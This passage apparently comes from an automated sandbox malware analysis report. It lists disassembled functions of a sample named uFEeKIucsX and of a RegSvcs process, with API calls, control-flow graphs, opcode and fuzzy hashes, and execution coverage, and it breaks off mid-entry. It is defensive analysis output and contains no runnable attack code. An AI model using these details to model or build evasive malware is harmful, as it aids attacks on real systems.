                                                                          • Opcode ID: a8220e653e0ce5ca8670df85e156846ba729a934bd4250d28ce5eaeb47a9df01
                                                                          • Instruction ID: 8c2a2936d0d62d644bac04dd60b64ce78850130f3f958ae7c1590621705330aa
                                                                          • Opcode Fuzzy Hash: a8220e653e0ce5ca8670df85e156846ba729a934bd4250d28ce5eaeb47a9df01
                                                                          • Instruction Fuzzy Hash: 0E8149B0A00B458FD724DF2AD05475ABBF1FF88308F008A2DD486D7A50DB75E94ACB91
                                                                          Function 02745DCC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 591 2745dcc-2745e99 CreateActCtxA 593 2745ea2-2745efc 591->593 594 2745e9b-2745ea1 591->594 601 2745efe-2745f01 593->601 602 2745f0b-2745f0f 593->602 594->593 601->602 603 2745f20 602->603 604 2745f11-2745f1d 602->604 605 2745f21 603->605 604->603 605->605
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 02745E89
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 368a6a62e3d5056306a8dd395d936c043657fb0fe6879480b22d0089879417f4
                                                                          • Instruction ID: 47535d0cb32188a57c96899c89c75fad055bb934963d09a08cafafc60a478698
                                                                          • Opcode Fuzzy Hash: 368a6a62e3d5056306a8dd395d936c043657fb0fe6879480b22d0089879417f4
                                                                          • Instruction Fuzzy Hash: 4241EEB0C00719CFDB24DFA9C884ACEBBB5BF49304F60806AD409AB251DB75694ACF91
                                                                          Function 02744544 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 607 2744544-2745e99 CreateActCtxA 610 2745ea2-2745efc 607->610 611 2745e9b-2745ea1 607->611 618 2745efe-2745f01 610->618 619 2745f0b-2745f0f 610->619 611->610 618->619 620 2745f20 619->620 621 2745f11-2745f1d 619->621 622 2745f21 620->622 621->620 622->622
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 02745E89
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 30272d70eaf8f61862caf1afebd2b8f9adc324f46b7037dfbd5e6244db89530f
                                                                          • Instruction ID: e96115d764e2279feae2325e496819e165717ad85c3d907e47fc9215feeb5f69
                                                                          • Opcode Fuzzy Hash: 30272d70eaf8f61862caf1afebd2b8f9adc324f46b7037dfbd5e6244db89530f
                                                                          • Instruction Fuzzy Hash: 5141CEB0D00719CBDB24DFA9C884A8EBBB5BF49304F60846AD409AB255DB71694ACF91
                                                                          Function 055F7668 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 624 55f7668-55f767a 625 55f7682-55f768d 624->625 626 55f767d call 55f420c 624->626 627 55f768f-55f769f 625->627 628 55f76a2-55f7734 CreateIconFromResourceEx 625->628 626->625 632 55f773d-55f775a 628->632 633 55f7736-55f773c 628->633 633->632
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromIconResource
                                                                          • String ID:
                                                                          • API String ID: 3668623891-0
                                                                          • Opcode ID: a386d72815c001f013ca1d79f77ba3c7aaec04d443e7a30ca09a13d4dee85cdc
                                                                          • Instruction ID: 3205c8ff7a0edc37160d7d9cbdda7e40e242c29197d416aae379ae9c41cbcabd
                                                                          • Opcode Fuzzy Hash: a386d72815c001f013ca1d79f77ba3c7aaec04d443e7a30ca09a13d4dee85cdc
                                                                          • Instruction Fuzzy Hash: DD3198729043499FCB018FA9C844AEEBFF8FF49310F14805AEA54A7221C339A850DFA1
                                                                          Function 055F419C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 636 55f419c-55f6864 638 55f686f-55f687e 636->638 639 55f6866-55f686c 636->639 640 55f6883-55f68bc DrawTextExW 638->640 641 55f6880 638->641 639->638 642 55f68be-55f68c4 640->642 643 55f68c5-55f68e2 640->643 641->640 642->643
                                                                          APIs
                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,055F67FD,?,?), ref: 055F68AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText
                                                                          • String ID:
                                                                          • API String ID: 2175133113-0
                                                                          • Opcode ID: ae9bc666eaf14bad0cd8e916ffe1ea3b3e02df9dea783be2f72fe36b9f075ed2
                                                                          • Instruction ID: ead7925ff9e4370fb4a29334c0bdc5aa4b148dadd12079c19375e07f0c859378
                                                                          • Opcode Fuzzy Hash: ae9bc666eaf14bad0cd8e916ffe1ea3b3e02df9dea783be2f72fe36b9f075ed2
                                                                          • Instruction Fuzzy Hash: 8731CEB5D003099FDB10CF9AD884AAEBBF5FB48320F14842EE919A7310D775A944CFA5
                                                                          Function 055F6810 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 646 55f6810-55f6864 648 55f686f-55f687e 646->648 649 55f6866-55f686c 646->649 650 55f6883-55f68bc DrawTextExW 648->650 651 55f6880 648->651 649->648 652 55f68be-55f68c4 650->652 653 55f68c5-55f68e2 650->653 651->650 652->653
                                                                          APIs
                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,055F67FD,?,?), ref: 055F68AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText
                                                                          • String ID:
                                                                          • API String ID: 2175133113-0
                                                                          • Opcode ID: 052048f885ca8eaa869c60c74d6c6d0e74acd9bcd4acd1ee7ff6a30a909aeab3
                                                                          • Instruction ID: 443148860e84b440cb2a1cc43e05dbfd09479c9fdf1c11739b9fbde1a87a28e4
                                                                          • Opcode Fuzzy Hash: 052048f885ca8eaa869c60c74d6c6d0e74acd9bcd4acd1ee7ff6a30a909aeab3
                                                                          • Instruction Fuzzy Hash: E431BFB5D002099FDB10CF9AD884A9EBBF5BB48320F14842EE919A7210D775A945CFA1
                                                                          Function 0274D308 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 656 274d308-274d83c DuplicateHandle 658 274d845-274d862 656->658 659 274d83e-274d844 656->659 659->658
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D76E,?,?,?,?,?), ref: 0274D82F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 071aef751ce95ee163c57a7f1c3b3d10247ec8dbe4fabc41179815b35fda4b55
                                                                          • Instruction ID: 736de44037ff85f0ce6038788cbe5fddbaf162805fde5f9f30ab74b5c93fc5ce
                                                                          • Opcode Fuzzy Hash: 071aef751ce95ee163c57a7f1c3b3d10247ec8dbe4fabc41179815b35fda4b55
                                                                          • Instruction Fuzzy Hash: 9D21E3B5D002499FDB10CF9AD584AEEBBF8FB48310F14806AE959A3350D379A954CFA1
                                                                          Function 055F420C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 662 55f420c-55f7734 CreateIconFromResourceEx 664 55f773d-55f775a 662->664 665 55f7736-55f773c 662->665 665->664
                                                                          APIs
                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,055F7682,?,?,?,?,?), ref: 055F7727
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromIconResource
                                                                          • String ID:
                                                                          • API String ID: 3668623891-0
                                                                          • Opcode ID: 770a4f441af50cf3900c529faeeeb5b85058e51e6cfff83842d8c9cf4e44727c
                                                                          • Instruction ID: 7c42feda513c2ced57b2f4aec3e610e2fda1cfe089879df8819cbb886d150ca3
                                                                          • Opcode Fuzzy Hash: 770a4f441af50cf3900c529faeeeb5b85058e51e6cfff83842d8c9cf4e44727c
                                                                          • Instruction Fuzzy Hash: 111153B18103499FCB10DFAAD844BEEBFF8EB48320F14841AEA15A7250C335A950CFA5
                                                                          Function 0274B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 668 274b4b8-274b4f8 669 274b500-274b52b GetModuleHandleW 668->669 670 274b4fa-274b4fd 668->670 671 274b534-274b548 669->671 672 274b52d-274b533 669->672 670->669 672->671
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B51E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 818be44ef46a84ba21e1048f0467224190669ad2bd5d1cdb6c4302e35fa25823
                                                                          • Instruction ID: 00b4d6127efd2583b95c4c0aaf0e9da161e8ed7814452040717ba486b12820a0
                                                                          • Opcode Fuzzy Hash: 818be44ef46a84ba21e1048f0467224190669ad2bd5d1cdb6c4302e35fa25823
                                                                          • Instruction Fuzzy Hash: 6611E0B5C013598FCB10CF9AD544ADEFBF4EF88318F15846AD819A7210D375A545CFA1
                                                                          Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b996209f8d1aa93c09c43bca4cc93e862329d438c1e339e81fc6b24af71e354
                                                                          • Instruction ID: 5dcdedebbf560b7cf58456c4a3778ee18cff2d116fdd2a78a06d25ac0a866d74
                                                                          • Opcode Fuzzy Hash: 1b996209f8d1aa93c09c43bca4cc93e862329d438c1e339e81fc6b24af71e354
                                                                          • Instruction Fuzzy Hash: 632145B1508240DFCB11DF14DDC0BA7BF65FB88318F34C569E8091B256D336D816CAA1
                                                                          Function 00EBD3D8 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ad0e1a1dd27a5c45cd733f8c8f9ee0a02ae8f4ca764554e1594719b7243972b
                                                                          • Instruction ID: 25659fce18060684a2278231158245ff7f0e75f2219c44c33de50d6b8441c1bb
                                                                          • Opcode Fuzzy Hash: 7ad0e1a1dd27a5c45cd733f8c8f9ee0a02ae8f4ca764554e1594719b7243972b
                                                                          • Instruction Fuzzy Hash: 6D2148B1508204DFDB05DF04DDC0B57BF65FB94324F24C569D9095B246D336E816C6A2
                                                                          Function 00ECD01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cc946ff2e8ed07fb3873382f59b95e8e367f4951a4cc5bf7eb99a91f4108b7a
                                                                          • Instruction ID: 7625de2f02fcbd90c83d95f8b2766bff60433b9a400d93f8809261f6d69afb90
                                                                          • Opcode Fuzzy Hash: 5cc946ff2e8ed07fb3873382f59b95e8e367f4951a4cc5bf7eb99a91f4108b7a
                                                                          • Instruction Fuzzy Hash: 8621D371508240DFDB14DF18DAC5F16BBA6EB84318F24C57DD84A5B286C337D807CA61
                                                                          Function 00ECD1D4 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a19bea782ca64dbdeaad8ad30374565ea43e1965f37ad661647e96726744fc19
                                                                          • Instruction ID: 465f586aba2ce2bb3e91448e1e77e74ef91207155cb068493aa676bc9073d75f
                                                                          • Opcode Fuzzy Hash: a19bea782ca64dbdeaad8ad30374565ea43e1965f37ad661647e96726744fc19
                                                                          • Instruction Fuzzy Hash: 6221CFB1508204AFDB09DF54DA80F26BBA5FB84318F24C57DE8495B2A2C337D817CA61
                                                                          Function 00ECD005 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d2059866ad7bc0f3ff610878a85afe475ecf0e09f063f2142d8710f94f9b767
                                                                          • Instruction ID: 3eb18afa7ead5d92aa513fd1d7871baba7bd535d9d3b33b93f425ea90f251db7
                                                                          • Opcode Fuzzy Hash: 6d2059866ad7bc0f3ff610878a85afe475ecf0e09f063f2142d8710f94f9b767
                                                                          • Instruction Fuzzy Hash: 502141755093809FD712CF24D994B15BF71EB46214F28C5EAD8498B6A7C33B980BCB62
                                                                          Function 00EBD4BF Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: 3f9ee7cbc4e9f1751500412f763949adc14b37045f8894d8554ac28027d6ae03
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 28112672404280CFCB12CF10D9C4B56BF71FB94328F24C6A9D8490B656C33AD85ACBA1
                                                                          Function 00EBD3D3 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: 7e50cad51fab55e6517647922f10dee5c8463f8a51176bc1a156387a23ab6cc1
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 82112672404240CFCB12CF00D9C4B56BF71FB94324F24C6A9D9090B656C33AE85ACBA2
                                                                          Function 00ECD1CF Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction ID: 8162b6ff101676eef936db67e1cb3cb45e37599ae65d37b789414c52ed460284
                                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction Fuzzy Hash: 1411BE75508240DFCB05CF50DAC4B15BB61FB84318F24C6ADD8494B666C33BD81ACB51
                                                                          Function 00EBD731 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65469402f049ad553881a7e492192a6800aaf4f837cf7e155d7280b4047d7aa4
                                                                          • Instruction ID: 987383d4d5d09d63e23f68c8f6178c6e0f622b8479db7a9a5da39d4aaab2a7a0
                                                                          • Opcode Fuzzy Hash: 65469402f049ad553881a7e492192a6800aaf4f837cf7e155d7280b4047d7aa4
                                                                          • Instruction Fuzzy Hash: DC01A7714093549AE7108A65CDC47E7BFD8DF41324F28D42BED095A182EA799844C6B1
                                                                          Function 00EBD730 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8bfebaa4736cfcc225afaab75f100d083a611ca9017ef50151243309549aa05d
                                                                          • Instruction ID: 1b477545f2f124fb4f7a91159b35ab3e10d2a78dd4eda0d390cec94a4c4c7369
                                                                          • Opcode Fuzzy Hash: 8bfebaa4736cfcc225afaab75f100d083a611ca9017ef50151243309549aa05d
                                                                          • Instruction Fuzzy Hash: 20F0C272409344AEE7108A16CD84BA7FFD8EF90738F18C45AED085A282D3799844CAB0

                                                                          Execution Graph

                                                                          Execution Coverage:0.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:5
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 62174 1162df0 LdrInitializeThunk 62176 1162c00 62178 1162c0a 62176->62178 62179 1162c11 62178->62179 62180 1162c1f LdrInitializeThunk 62178->62180

                                                                          Executed Functions

                                                                          Function 01162C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 1162c0a-1162c0f 1 1162c11-1162c18 0->1 2 1162c1f-1162c26 LdrInitializeThunk 0->2
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0117FD4F,000000FF,00000024,01216634,00000004,00000000,?,-00000018,7D810F61,?,?,01138B12,?,?,?,?), ref: 01162C24
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                                          • Instruction ID: 6f95fda90829e7cc92d16866cb438b0c781fc5a6699eab2012741425aa1bce24
                                                                          • Opcode Fuzzy Hash: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                                          • Instruction Fuzzy Hash: 39B09B719015C5C9DA15F764470C717791477D0701F25C071D2030651F4739C1D1E275
                                                                          Function 01162DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 4 1162df0-1162dfc LdrInitializeThunk
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0119E73E,0000005A,011FD040,00000020,00000000,011FD040,00000080,01184A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0116AE00), ref: 01162DFA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                                          • Instruction ID: 042508d184cbd46dd115a12e78de89dd8edf7908fb042ff4b00972b947d89437
                                                                          • Opcode Fuzzy Hash: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                                          • Instruction Fuzzy Hash: 1790023120140413D11571584608707001997D0241F95C422A0425568DD7568A52A221
                                                                          Function 011635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5 11635c0-11635cc LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                                          • Instruction ID: f6c3b1d9a17d968a2e49635b92f18c3a7a27fe1d8aa7139e2ade80c0bba2b3ce
                                                                          • Opcode Fuzzy Hash: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                                          • Instruction Fuzzy Hash: 7190023160550402D10471584618706101597D0201F65C421A0425578DC7958A5166A2
                                                                          Function 0042E443 Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 18 42e443-42e484 call 42e933 22 42e486-42e4a3 18->22 23 42e4de-42e4e3 18->23 25 42e4b6-42e4db 22->25 26 42e4a5-42e4ad 22->26 25->23 27 42e4b3 26->27 27->25
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                          • Instruction ID: 4366241f30172668ac266cf9dbbaaf2ab3a96406b79bd4ea90d7b1ecfc278b4f
                                                                          • Opcode Fuzzy Hash: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                          • Instruction Fuzzy Hash: 6B017971D0122866FB60EB95AC42FD973B89B08315F4006DAF50CA25C1FF74A78C8A55
                                                                          Function 0042E43E Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
